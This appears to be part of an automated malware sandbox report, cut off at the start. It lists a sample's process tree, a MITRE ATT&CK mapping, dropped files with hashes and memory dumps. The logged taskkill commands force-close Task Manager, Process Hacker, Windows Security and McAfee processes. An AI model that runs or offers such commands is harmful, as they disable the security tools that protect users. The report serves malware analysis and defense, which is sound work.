  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  - Kills process with taskkill
  PID:3524
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:2776
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  - Kills process with taskkill
  PID:5244
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:4444
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5564
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5692
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:1156
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:916
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5304
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5140
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4944
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:1948

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3620

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2372

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:3712

C:\Windows\system32\resmon.exe
"C:\Windows\system32\resmon.exe"
1⤵
PID:3016
- C:\Windows\System32\perfmon.exe
  "C:\Windows\System32\perfmon.exe" /res
  2⤵
  PID:2456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:5272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd1c5c9758,0x7ffd1c5c9768,0x7ffd1c5c9778
  2⤵
  PID:5584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1920,i,5591363128172424353,9037922026721586345,131072 /prefetch:8
  2⤵
  PID:5712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2248 --field-trial-handle=1920,i,5591363128172424353,9037922026721586345,131072 /prefetch:8
  2⤵
  PID:6056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1752 --field-trial-handle=1920,i,5591363128172424353,9037922026721586345,131072 /prefetch:2
  2⤵
  PID:5652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3024 --field-trial-handle=1920,i,5591363128172424353,9037922026721586345,131072 /prefetch:1
  2⤵
  PID:2540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3008 --field-trial-handle=1920,i,5591363128172424353,9037922026721586345,131072 /prefetch:1
  2⤵
  PID:4936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4604 --field-trial-handle=1920,i,5591363128172424353,9037922026721586345,131072 /prefetch:1
  2⤵
  PID:6136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4968 --field-trial-handle=1920,i,5591363128172424353,9037922026721586345,131072 /prefetch:8
  2⤵
  PID:4164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5068 --field-trial-handle=1920,i,5591363128172424353,9037922026721586345,131072 /prefetch:1
  2⤵
  PID:5148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3004 --field-trial-handle=1920,i,5591363128172424353,9037922026721586345,131072 /prefetch:8
  2⤵
  PID:1672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1644 --field-trial-handle=1920,i,5591363128172424353,9037922026721586345,131072 /prefetch:8
  2⤵
  PID:5524

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
195KB

MD5
873734b55d4c7d35a177c8318b0caec7

SHA1
469b913b09ea5b55e60098c95120cc9b935ddb28

SHA256
4ee3aa3dc43cb3ef3f6bfb91ed8214659e9c2600a45bee9728ebbcb6f33b088d

SHA512
24f05ed981e994475879ca2221b6948418c4412063b9c07f46b8de581047ddd5d73401562fa9ee54d4ce5f97a6288c54eac5de0ca29b1bb5797bdac5a1b30308

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000010

Filesize
129KB

MD5
ed24687da28504b8a8dbaac60096eb9f

SHA1
eee7308cf80bbeb4bfb0f66d5fe0baaf9c0531ca

SHA256
983cdbc0153e6edf4437a3ebda7f04509f04bb669e306c0a214947448b62627d

SHA512
157bfb3eb3be1d8e78f7994118406fac6d961e903ce40eba22a7650eea3a82a9ff816f6a5b56a817fcefd3e0855565dca64c312235b8e74aefe864bf362abebd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000012

Filesize
74KB

MD5
ae2fe4fe5be048ff183db4ad506d9b90

SHA1
d6e5f9925cc299aca646f3aaf55df324f2932063

SHA256
ee98519d80625f797d3a74f3c639c5dced9c7f8a06bb5a84d284683f3939811b

SHA512
f68790de98aaaa2d292dea1ba2c613d44cb6abfd8e6706e50e4fefd7e7a2e19689ac1481069487f1c26394bbc512181769a2f6374c8da634865ebca6b29646c7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000013

Filesize
40KB

MD5
d2d0c427f1d093c36a9fd6751a9a9d61

SHA1
dbd596ab1f2256ed3e3816be5eeb75d34f38f821

SHA256
b37bce0e0f504a7b54d3a01007169d4126c2a401be8f93afe35f665e62c3e34f

SHA512
b8418e074df9619ae62461b5c42fcc42d2ffb8b099e09ec0271bb481f8e1ad8d7655fd5149d8abdbce1d35226029f200623574946d6223df1c9c14c7824d63ca

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001d

Filesize
243KB

MD5
7fab086b6865d4a3b37f34ecee0d1fce

SHA1
d81a38d64100dc5c848ce2a555ad262c771181ca

SHA256
15e4e02a5390db09957c5c4e6241efdad0e970f30c09cea2c99f8338b6517aef

SHA512
08d0e001dbd435238dde764e13ed91837de338eb390afd02e1cdae6f5779c689e20c0b6e41575cfeb12beb2bafa07ff0dc6a32f4863f77e30d91b9a34cab9deb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001e

Filesize
156KB

MD5
54b7184453d044db0c185fb309ca55c9

SHA1
fc7675ece42b67ab96bfbd35280917be64c19b61

SHA256
669df6382d6640759ef332f79c6080a64ce46383102a242b1e6acf8020a2f2e2

SHA512
2b4fe765a9a056edada55dab4cdb9c5810654393465a5dc9b932b3443c5a785cf1c4272fcb7e7cc9a1188eb6847486b57a2aedfd3548eb69e22d45f27795100c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
168B

MD5
85d87033957c5906ffd0934e6c2c25fa

SHA1
1a2cc9b14476910d4e5d9c3cd9a5ed9db0106208

SHA256
16994dd882dc6f753a74ca46954bdb0e3a580ed4629a7249bd0d2d6222da9253

SHA512
f30d69a142e975702187a59cc938f6c4e4408aab96225725d4a722019dae500c26161d1da12abf0c807098eaefe35b7d80b5b6469bfc85a907ca839b5f9b4d03

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
168B

MD5
c4ac0c065ecac9d8b2c7f1ba2d661732

SHA1
eee06c6f2296fbf6029c50811f07e6885564d447

SHA256
a3c6f1dbdbf662b00308b150679fc63931e5c1211567f459b52b3981e8b8a875

SHA512
87e1c96ce374dbfcaa0b37a787c3c36f4fb8b649667fc1b8d610e2acaf5ba6ab357f89bdde585466a784a73fc2d2493c16563307337aae3b3c09e01593a66149

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
8c8b2274fc6aba756208814ae6349436

SHA1
63a735cb38a0833f55e923443ae5d97aafa5a730

SHA256
ea445937af88f1537c709656041e70db3ad858385a8a3640d018f3c8a110bf3d

SHA512
b0e6f1481add3ac78487a7510b984d16c15d9c046d663f84956f3e1df5c0270ac56249e6e5be4b2d14dada086b8a8e3cc12b79709b26078264e86282a6a9beed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
6f378035d679ca2f6a421c58f58f449d

SHA1
106928b6bfae6d7f43fe51ed14075c8946402164

SHA256
361221f0ea05a3616744ca0a1debc2ed009daacee0b33614e2c24b7b02b09caf

SHA512
4418d10d6ef6659d881cbc6045a33d473a1428b34d051988b982177c58e3039d77dfebd59407a73cb56429536d647e1a194748063d3d65df7f69357e03f632b1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
9a7116626dd804a64c92dd13b6003190

SHA1
6419132e1bde607dacc15e3cfd9be838c780384e

SHA256
0569ba78baa9bd229ebbb065a83ac50179b7823038dbe6a0af9fd9550943f72f

SHA512
bc35670c356c3a11c43f46956bbacfe695088b5b553f634162e99ec1e3188e9beae651fd8b17d911c9cc1f9ab0bb6c02c70300564a1536b04bcbbee8cd8d2a36

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
874B

MD5
ea8a62f8784e26e0f3acee2973577be4

SHA1
70f6c5a8300837ce271457e824fc9b7e6a2582b8

SHA256
d6a3a1b2bbd862c0f3c6baff84d387736c071f2c9e678b9a73e115c04079b14f

SHA512
22cbfd890a9ab87b3e534f276f08876c8749ac81c786fbaa38e4dd2a8d6f4ba91f449fed2c2146a1b18f80321a1e1003aa0d47051fb97ef8c3d1f5c40088b44c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
e4b9fb9b59572f98ca7baa526c9d28af

SHA1
ca8029bc76d3787b29b8eda298fb7e3bfb23fb88

SHA256
6ac6a2042a980a6612c67fb9677256ea623bd56a6345207ee8ba5446c07b8bab

SHA512
9740d14fb9873fb2f67c792b9882abc4204860a534ac0a28d06c3aaea91cb27296f1b948da561d0ac0c77fc5f95959c946dfc1a8ef7d7e692c001a87bf7fe118

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
80a234df2358bcc0fefbbc6242aa73a2

SHA1
8a652b157fa3b372d1191ab61a9742f1807e7586

SHA256
7169f84b4026ff5432dcbd7001c61f79fe93f2390e2458d1500462708a83c6c8

SHA512
80598d3f8030b565ea63da6f7d91fbbacb0dc170315e419f26e79191c54eaaa0011c1bc2a58e1b9290b8beefe868c8aadcf4a2765b13681f48799fc73794ec99

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
6a37457fdf465be800c1581a0af4dd03

SHA1
1e5d38d3228330cb7de1610a4d5f86e0bdc189ff

SHA256
da68835f38679fe0c403ea2bdcefce626f7559643bfbd069a5b8c41399142886

SHA512
a645a5c4d3a6080ebca16c0263230b17fc987f77d8dc752982715129bb6f09e93f98832dfa6c08f563f53e10078d21361f2ec4484f0b7a80b27032b8a97b690c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
7ac20461088fbda957dbae742f98499a

SHA1
9b84fec2a2367878954eb7ee44908edff9857f22

SHA256
93760a48f8525b4866e7a9114790ed1c1f07ee3b2cc6a0f7f91c2e1ad22edd0c

SHA512
21f5a4671e4ffbbcfa8de21a3ad4841f1bb87b6a26a1c5f217265cac8e31c623ee279104dd668f7a3d76de2c8441589de1abd751994a7af0b794a7f513e22aea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
91f150c6946643a6e27cec4e4a679a11

SHA1
0a8c238e033f99acec9583456754c60b6731bc20

SHA256
7269c5c09ee12d679ef07f2b40bd475b7d7865e2f34ab97ff568e7276c2eb51b

SHA512
90e5834334528193f42fc483e6c1300f691e61743f79514aad999300a21d0b2516db015cf49d370db7ac93977264ae0fa7ff0a8a9c3254d25fe6a4f387e222b6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
bbf0e66a4e8a3abedd6dfb512ddebeed

SHA1
81db269bee2be3402b16ab0507e628c8e8ab14f5

SHA256
e26a77e3f8b562cb2b833b42aab60ecf42c48b33ef15b60ce9ddcf5dfab3830e

SHA512
86eb3925773600acdd894a448d5c498a184b1b5afee87e0ee49e75a01728f528ea039cff5f988e8c1ba4b1e52c5d6815aab51c5d975897bae52648515153bab9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\b1207014-0379-4388-ad4a-aad953f43233.tmp

Filesize
257KB

MD5
9edb805d5f8c91ee6ad553992fa2af13

SHA1
513b8b01dec1e014b81cc4c4eb74c8312b04ebea

SHA256
be2fcd527913a716afdd4b9e06c9bd13b7eba1c64eb82c6f18313a03fc6d5642

SHA512
c215119261d5f6a2726519f4d74e4363f65294232f201fcaac3c0c7a27c32bd6602fe5549af80dc52b771823d9edd9704b92728ef89da113dce1a5e30d1b9c75

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
42350a12386723b4e1ca0bb95f5f8cae

SHA1
f43087d71f24c7e4aa248991c965ecc47b5d92db

SHA256
83958ad5afd6a131a4a57ae82b6ca2921433384829d874762d03298e73bbcc6b

SHA512
f4d9a90be891e90967d163025b15affd44bcf569c27d38b45dd6447863bbbd96e5363a976b065a4c1ea4bf41f1678f9f5be83972ff8717422b2d406043ade11a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2a8609157492e803a5e6743bae12acda

SHA1
d78edcde30e8fb2f571a294898d18659aa191db6

SHA256
a505bc1e65b65953e321bc3375fb76d5e12435198fb12ddcd83f9ef6b1a6573c

SHA512
deaa8d813d92f59df0d548c4977e6839fb5f4af1e3c1c964e0c0a4aedbfdcc3dacd90a7c39616e050b9c402f3868ac9e63479db653a92d3ef5272ef6e7395d2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
49d24ec1d48867d0749f1d2225a43d48

SHA1
51bfa9d0a07005ffea89d793b4756ce495c31e96

SHA256
53b01cc678b2f51deee70104684f5d81de3cc2dcee20f4bd5b25ce19b9eb0828

SHA512
e9a66f44338c8566adebac74334c7aed38fa961f205b0dd1988a972042011abcde01af17986f93964c7017616ff6cc0208187a2fa1bdc9dda7a6f130e108df72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2590af331a6e0c66a811278ce73ff345

SHA1
c664c6ad5409144a76f600e83fddc9d79725baa6

SHA256
49a45eab2331a254d2a9f98b0d12592bc24703332b7e5dc4e0b48b079aaf2906

SHA512
001c1d097a6ff25261ab7aa4ab2e4d1addd6cf642ac5f29a76c6d95857effb702ec031fcf464b4066a2016668c90fd4913f881970d627806c643c074ec15d973

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_45yifwon.q2p.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\taskhostn.exe

Filesize
2.3MB

MD5
8a098891659c0f6be3801985e4a02a0b

SHA1
9560c72ccfa4d08ea11318b8a58fc6f01ab7c98a

SHA256
0c5f1047f592774ab23781b09df5146cd8fc4560beca673294d9548d0c60c4b4

SHA512
759af0afeb8540f68a879a353728edc025062b1e227df14efe3203828e6cb587f02d7a791184432c071a2f23bdecd2620fb5b39ebccd6f4ca58c207c98e7203c

Download Submit
memory/1852-54-0x0000000070570000-0x00000000705BC000-memory.dmp

Filesize
304KB

Download
memory/1852-66-0x00000000079C0000-0x0000000007A63000-memory.dmp

Filesize
652KB

Download
memory/1852-68-0x0000000007B20000-0x0000000007B3A000-memory.dmp

Filesize
104KB

Download
memory/1852-67-0x0000000008160000-0x00000000087DA000-memory.dmp

Filesize
6.5MB

Download
memory/1852-69-0x0000000007B90000-0x0000000007B9A000-memory.dmp

Filesize
40KB

Download
memory/1852-70-0x0000000007DA0000-0x0000000007E36000-memory.dmp

Filesize
600KB

Download
memory/1852-71-0x0000000007D20000-0x0000000007D31000-memory.dmp

Filesize
68KB

Download
memory/1852-72-0x0000000007D50000-0x0000000007D5E000-memory.dmp

Filesize
56KB

Download
memory/1852-73-0x0000000007D60000-0x0000000007D74000-memory.dmp

Filesize
80KB

Download
memory/1852-74-0x0000000007E60000-0x0000000007E7A000-memory.dmp

Filesize
104KB

Download
memory/1852-75-0x0000000007E40000-0x0000000007E48000-memory.dmp

Filesize
32KB

Download
memory/1852-78-0x0000000074D60000-0x0000000075510000-memory.dmp

Filesize
7.7MB

Download
memory/1852-65-0x0000000002EC0000-0x0000000002ED0000-memory.dmp

Filesize
64KB

Download
memory/1852-64-0x0000000006D30000-0x0000000006D4E000-memory.dmp

Filesize
120KB

Download
memory/1852-52-0x0000000006D50000-0x0000000006D82000-memory.dmp

Filesize
200KB

Download
memory/1852-53-0x000000007F080000-0x000000007F090000-memory.dmp

Filesize
64KB

Download
memory/1852-51-0x0000000006DD0000-0x0000000006E1C000-memory.dmp

Filesize
304KB

Download
memory/1852-50-0x00000000067C0000-0x00000000067DE000-memory.dmp

Filesize
120KB

Download
memory/1852-49-0x0000000006340000-0x0000000006694000-memory.dmp

Filesize
3.3MB

Download
memory/1852-44-0x00000000061D0000-0x0000000006236000-memory.dmp

Filesize
408KB

Download
memory/1852-38-0x00000000060F0000-0x0000000006156000-memory.dmp

Filesize
408KB

Download
memory/1852-37-0x0000000005F70000-0x0000000005F92000-memory.dmp

Filesize
136KB

Download
memory/1852-34-0x0000000002EC0000-0x0000000002ED0000-memory.dmp

Filesize
64KB

Download
memory/1852-35-0x0000000005940000-0x0000000005F68000-memory.dmp

Filesize
6.2MB

Download
memory/1852-36-0x0000000002EC0000-0x0000000002ED0000-memory.dmp

Filesize
64KB

Download
memory/1852-33-0x0000000074D60000-0x0000000075510000-memory.dmp

Filesize
7.7MB

Download
memory/1852-32-0x0000000002F10000-0x0000000002F46000-memory.dmp

Filesize
216KB

Download
memory/2096-101-0x0000000006DE0000-0x0000000006DFE000-memory.dmp

Filesize
120KB

Download
memory/2096-29-0x0000000000C50000-0x000000000128A000-memory.dmp

Filesize
6.2MB

Download
memory/2096-133-0x0000000076DE0000-0x0000000076ED0000-memory.dmp

Filesize
960KB

Download
memory/2096-18-0x0000000000C50000-0x000000000128A000-memory.dmp

Filesize
6.2MB

Download
memory/2096-137-0x0000000076DE0000-0x0000000076ED0000-memory.dmp

Filesize
960KB

Download
memory/2096-138-0x0000000076DE0000-0x0000000076ED0000-memory.dmp

Filesize
960KB

Download
memory/2096-139-0x0000000076DE0000-0x0000000076ED0000-memory.dmp

Filesize
960KB

Download
memory/2096-20-0x0000000076DE0000-0x0000000076ED0000-memory.dmp

Filesize
960KB

Download
memory/2096-21-0x0000000076DE0000-0x0000000076ED0000-memory.dmp

Filesize
960KB

Download
memory/2096-22-0x0000000076DE0000-0x0000000076ED0000-memory.dmp

Filesize
960KB

Download
memory/2096-132-0x0000000076DE0000-0x0000000076ED0000-memory.dmp

Filesize
960KB

Download
memory/2096-154-0x0000000076DE0000-0x0000000076ED0000-memory.dmp

Filesize
960KB

Download
memory/2096-155-0x0000000076DE0000-0x0000000076ED0000-memory.dmp

Filesize
960KB

Download
memory/2096-23-0x0000000076DE0000-0x0000000076ED0000-memory.dmp

Filesize
960KB

Download
memory/2096-159-0x0000000007070000-0x000000000707A000-memory.dmp

Filesize
40KB

Download
memory/2096-131-0x0000000000C50000-0x000000000128A000-memory.dmp

Filesize
6.2MB

Download
memory/2096-24-0x0000000076DE0000-0x0000000076ED0000-memory.dmp

Filesize
960KB

Download
memory/2096-25-0x0000000077874000-0x0000000077876000-memory.dmp

Filesize
8KB

Download
memory/2096-28-0x0000000000C50000-0x000000000128A000-memory.dmp

Filesize
6.2MB

Download
memory/2096-134-0x0000000076DE0000-0x0000000076ED0000-memory.dmp

Filesize
960KB

Download
memory/2096-30-0x0000000005240000-0x00000000052D2000-memory.dmp

Filesize
584KB

Download
memory/2096-31-0x0000000005890000-0x0000000005E34000-memory.dmp

Filesize
5.6MB

Download
memory/2096-100-0x0000000006D90000-0x0000000006DE0000-memory.dmp

Filesize
320KB

Download
memory/2096-99-0x0000000006BC0000-0x0000000006C36000-memory.dmp

Filesize
472KB

Download
memory/3776-81-0x0000000074D60000-0x0000000075510000-memory.dmp

Filesize
7.7MB

Download
memory/3776-98-0x0000000074D60000-0x0000000075510000-memory.dmp

Filesize
7.7MB

Download
memory/5328-157-0x0000000074D60000-0x0000000075510000-memory.dmp

Filesize
7.7MB

Download
memory/5328-141-0x0000000002910000-0x0000000002920000-memory.dmp

Filesize
64KB

Download
memory/5328-140-0x0000000074D60000-0x0000000075510000-memory.dmp

Filesize
7.7MB

Download
memory/5328-151-0x0000000005C60000-0x0000000005FB4000-memory.dmp

Filesize
3.3MB

Download
memory/5808-115-0x0000000002F60000-0x0000000002F70000-memory.dmp

Filesize
64KB

Download
memory/5808-130-0x0000000006E30000-0x0000000006E52000-memory.dmp

Filesize
136KB

Download
memory/5808-129-0x0000000006C70000-0x0000000006CBC000-memory.dmp

Filesize
304KB

Download
memory/5808-124-0x0000000006330000-0x0000000006684000-memory.dmp

Filesize
3.3MB

Download
memory/5808-116-0x0000000002F60000-0x0000000002F70000-memory.dmp

Filesize
64KB

Download
memory/5808-114-0x0000000074D60000-0x0000000075510000-memory.dmp

Filesize
7.7MB

Download
memory/5808-136-0x0000000074D60000-0x0000000075510000-memory.dmp

Filesize
7.7MB

Download